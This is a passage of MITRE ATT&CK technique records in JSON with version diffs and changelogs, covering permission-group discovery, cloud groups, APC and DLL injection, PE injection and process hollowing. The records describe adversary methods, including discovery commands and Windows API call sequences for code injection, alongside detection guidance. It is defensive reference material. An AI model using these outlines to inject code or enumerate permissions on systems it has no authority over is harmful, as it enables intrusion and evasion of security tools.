| > | ng available APIs such as <code>GetAccountPasswordPolicy</co | ||||
| > | de> in AWS (Citation: AWS GetPasswordPolicy). |
kubectl auth can-i.(Citation: K8s Authorization Overview)",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"Azure AD",
"Office 365",
"SaaS",
"IaaS",
"Linux",
"macOS",
"Google Workspace",
"Containers"
],
"x_mitre_version": "2.4",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 18:10:53.423000+00:00\", \"old_value\": \"2021-03-30 12:29:56.512000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\\n\\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)\", \"old_value\": \"System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\\n\\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\\n \\n-Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\\n+Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.4\", \"old_value\": \"2.3\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"K8s Authorization Overview\", \"description\": \"Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.\", \"url\": \"https://kubernetes.io/docs/reference/access-authn-authz/authorization/\"}, \"root['x_mitre_contributors'][0]\": \"Daniel Prizmant, Palo Alto Networks\", \"root['x_mitre_contributors'][1]\": \"Yuval Avrahami, Palo Alto Networks\", \"root['x_mitre_data_sources'][0]\": \"Pod: Pod Metadata\", \"root['x_mitre_platforms'][8]\": \"Containers\"}}",
"previous_version": "2.3",
"version_change": "2.3 \u2192 2.4",
"changelog_mitigations": {
"shared": [
"T1069: Permission Groups Discovery Mitigation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0014: Pod (Pod Metadata)",
"DS0015: Application Log (Application Log Content)",
"DS0017: Command (Command Execution)",
"DS0036: Group (Group Enumeration)",
"DS0036: Group (Group Metadata)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-02-21 21:15:33.222000+00:00",
"modified": "2021-06-25 12:13:37.940000+00:00",
"name": "Cloud Groups",
"description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1069/003",
"external_id": "T1069.003"
},
{
"source_name": "Microsoft Msolrole",
"description": "Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.",
"url": "https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0"
},
{
"source_name": "GitHub Raindance",
"description": "Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.",
"url": "https://github.com/True-Demon/raindance"
},
{
"source_name": "Microsoft AZ CLI",
"description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.",
"url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest"
},
{
"source_name": "Black Hills Red Teaming MS AD Azure, 2018",
"description": "Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.",
"url": "https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/"
},
{
"source_name": "Google Cloud Identity API Documentation",
"description": "Google. (n.d.). Retrieved March 16, 2021.",
"url": "https://cloud.google.com/identity/docs/reference/rest"
},
{
"source_name": "AWS Get Bucket ACL",
"description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.",
"url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Regina Elwell",
"Isif Ibrahima"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Group: Group Enumeration",
"Group: Group Metadata",
"Application Log: Application Log Content"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Azure AD",
"Office 365",
"SaaS",
"IaaS",
"Google Workspace"
],
"x_mitre_version": "1.3",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Regina Elwell\", \"Isif Ibrahima\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-06-25 12:13:37.940000+00:00\", \"old_value\": \"2021-03-30 12:42:46.315000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\\n\\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\\n\\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).\\n\\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.\", \"old_value\": \"Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\\n\\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft Msolrole)(Citation: GitHub Raindance)\\n\\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,7 @@\\n Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\\n \\n-With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft Msolrole)(Citation: GitHub Raindance)\\n+With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\\n \\n-Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)\\n+Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).\\n+\\n+Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.3\", \"old_value\": \"1.2\"}}, \"iterable_item_added\": {\"root['external_references'][6]\": {\"source_name\": \"AWS Get Bucket ACL\", \"description\": \"Amazon Web Services. (n.d.). Retrieved May 28, 2021.\", \"url\": \"https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html\"}}}",
"previous_version": "1.2",
"version_change": "1.2 \u2192 1.3",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may attempt to find cloud groups and permission | t | 1 | Adversaries may attempt to find cloud groups and permission |
| > | settings. The knowledge of cloud permission groups can help | > | settings. The knowledge of cloud permission groups can help | ||
| > | adversaries determine the particular roles of users and grou | > | adversaries determine the particular roles of users and grou | ||
| > | ps within an environment, as well as which users are associa | > | ps within an environment, as well as which users are associa | ||
| > | ted with a particular group. With authenticated access ther | > | ted with a particular group. With authenticated access ther | ||
| > | e are several tools that can be used to find permissions gro | > | e are several tools that can be used to find permissions gro | ||
| > | ups. The <code>Get-MsolRole</code> PowerShell cmdlet can be | > | ups. The <code>Get-MsolRole</code> PowerShell cmdlet can be | ||
| > | used to obtain roles and permissions groups for Exchange and | > | used to obtain roles and permissions groups for Exchange and | ||
| > | Office 365 accounts.(Citation: Microsoft Msolrole)(Citation | > | Office 365 accounts (Citation: Microsoft Msolrole)(Citation | ||
| > | : GitHub Raindance) Azure CLI (AZ CLI) and the Google Cloud | > | : GitHub Raindance). Azure CLI (AZ CLI) and the Google Clou | ||
| > | Identity Provider API also provide interfaces to obtain per | > | d Identity Provider API also provide interfaces to obtain pe | ||
| > | missions groups. The command <code>az ad user get-member-gro | > | rmissions groups. The command <code>az ad user get-member-gr | ||
| > | ups</code> will list groups associated to a user account for | > | oups</code> will list groups associated to a user account fo | ||
| > | Azure while the API endpoint <code>GET https://cloudidentit | > | r Azure while the API endpoint <code>GET https://cloudidenti | ||
| > | y.googleapis.com/v1/groups</code> lists group resources avai | > | ty.googleapis.com/v1/groups</code> lists group resources ava | ||
| > | lable to a user for Google.(Citation: Microsoft AZ CLI)(Cita | > | ilable to a user for Google (Citation: Microsoft AZ CLI)(Cit | ||
| > | tion: Black Hills Red Teaming MS AD Azure, 2018)(Citation: G | > | ation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: | ||
| > | oogle Cloud Identity API Documentation) | > | Google Cloud Identity API Documentation). Adversaries may a | ||
| > | ttempt to list ACLs for objects to determine the owner and o | ||||
| > | ther accounts with access to the object, for example, via th | ||||
| > | e AWS <code>GetBucketAcl</code> API (Citation: AWS Get Bucke | ||||
| > | t ACL). Using this information an adversary can target accou | ||||
| > | nts with permissions to a given object or leverage accounts | ||||
| > | they have already compromised to access the object. |
CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 12:30:14.852000+00:00\", \"old_value\": \"2021-02-09 15:43:50.029000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][0]\": \"Process: Process Modification\"}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"changelog_mitigations": {
"shared": [
"M1026: Privileged Account Management",
"M1040: Behavior Prevention on Endpoint"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Access)",
"DS0009: Process (Process Modification)",
"DS0011: Module (Module Load)",
"DS0022: File (File Metadata)",
"DS0022: File (File Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-14 01:29:43.786000+00:00",
"modified": "2021-10-18 12:23:46.476000+00:00",
"name": "Asynchronous Procedure Call",
"description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1055/004",
"external_id": "T1055.004"
},
{
"source_name": "Microsoft APC",
"description": "Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.",
"url": "https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx"
},
{
"source_name": "CyberBit Early Bird Apr 2018",
"description": "Gavriel, H. & Erbesfeld, B. (2018, April 11). New \u2018Early Bird\u2019 Code Injection Technique Discovered. Retrieved May 24, 2018.",
"url": "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/"
},
{
"source_name": "ENSIL AtomBombing Oct 2016",
"description": "Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.",
"url": "https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows"
},
{
"source_name": "Microsoft Atom Table",
"description": "Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.",
"url": "https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx"
},
{
"source_name": "Elastic Process Injection July 2017",
"description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
"url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Modification",
"Process: OS API Execution",
"Process: Process Access"
],
"x_mitre_defense_bypassed": [
"Application control",
"Anti-virus"
],
"x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 12:23:46.476000+00:00\", \"old_value\": \"2020-11-10 18:29:30.961000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][0]\": \"Process: Process Modification\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1040: Behavior Prevention on Endpoint"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Access)",
"DS0009: Process (Process Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-14 01:26:08.145000+00:00",
"modified": "2021-10-18 12:20:00.382000+00:00",
"name": "Dynamic-link Library Injection",
"description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1055/001",
"external_id": "T1055.001"
},
{
"source_name": "Elastic Process Injection July 2017",
"description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
"url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
},
{
"source_name": "Elastic HuntingNMemory June 2017",
"description": "Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017.",
"url": "https://www.endgame.com/blog/technical-blog/hunting-memory"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Modification",
"Module: Module Load",
"Process: OS API Execution",
"Process: Process Access"
],
"x_mitre_defense_bypassed": [
"Application control",
"Anti-virus"
],
"x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 12:20:00.382000+00:00\", \"old_value\": \"2020-11-10 18:29:30.879000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][0]\": \"Process: Process Modification\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1040: Behavior Prevention on Endpoint"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Access)",
"DS0009: Process (Process Modification)",
"DS0011: Module (Module Load)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-14 01:27:31.344000+00:00",
"modified": "2021-10-18 12:21:11.178000+00:00",
"name": "Portable Executable Injection",
"description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1055/002",
"external_id": "T1055.002"
},
{
"source_name": "Elastic Process Injection July 2017",
"description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
"url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Modification",
"Process: OS API Execution",
"Process: Process Access"
],
"x_mitre_defense_bypassed": [
"Anti-virus",
"Application control"
],
"x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 12:21:11.178000+00:00\", \"old_value\": \"2020-11-10 18:29:30.882000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][0]\": \"Process: Process Modification\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1040: Behavior Prevention on Endpoint"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Access)",
"DS0009: Process (Process Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-14 17:21:54.470000+00:00",
"modified": "2021-10-18 12:30:14.640000+00:00",
"name": "Process Hollowing",
"description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1055/012",
"external_id": "T1055.012"
},
{
"source_name": "Leitch Hollowing",
"description": "Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.",
"url": "http://www.autosectools.com/process-hollowing.pdf"
},
{
"source_name": "Elastic Process Injection July 2017",
"description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
"url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Modification",
"Process: OS API Execution",
"Process: Process Access"
],
"x_mitre_defense_bypassed": [
"Application control",
"Anti-virus"
],
